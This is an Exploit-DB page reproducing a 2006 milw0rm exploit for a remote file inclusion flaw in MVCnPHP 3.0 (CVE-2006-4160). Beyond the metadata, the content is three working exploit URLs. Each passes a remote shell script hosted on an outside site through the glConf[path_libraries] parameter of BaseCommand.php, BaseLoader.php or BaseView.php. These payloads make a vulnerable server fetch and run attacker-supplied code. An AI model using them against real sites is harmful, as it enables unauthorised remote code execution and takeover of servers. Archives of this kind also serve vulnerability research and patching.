MVCnPHP <= 3.0 glConf[path_libraries] Remote Include Vulnerabilities



EDB-ID: 2173 CVE: 2006-4160OSVDB-ID: 27894
Author: Drago84Published: 2006-08-10Verified: Verified
Exploit Code:   DownloadVulnerable App:   N/A

Rating

(0.0)
Prev Home Next
MVCnPHP Remote File Inclusion
############ToXiC CrEw###############
Bug Found by Drago84
Page  Sources:
http://freshmeat.net/redir/mvcnphp/46123/url_tgz/Geeklog_MVCnPHP-3.0.0.tgz
Page Affect:
BaseCommand.php
BaseLoader.php
BaseView.php
ExP:
http://www.sito.com/dir_mvcnphp/BaseCommand.php?glConf[path_libraries]=http://evalsite.com/shell.php
http://www.sito.com/dir_mvcnphp/BaseLoader.php?glConf[path_libraries]=http://evalsite.com/shell.php
http://www.sito.com/dir_mvcnphp/BaseView.php?glConf[path_libraries]=http://evalsite.com/shell.php
# milw0rm.com [2006-08-10]






Comments

No comments so far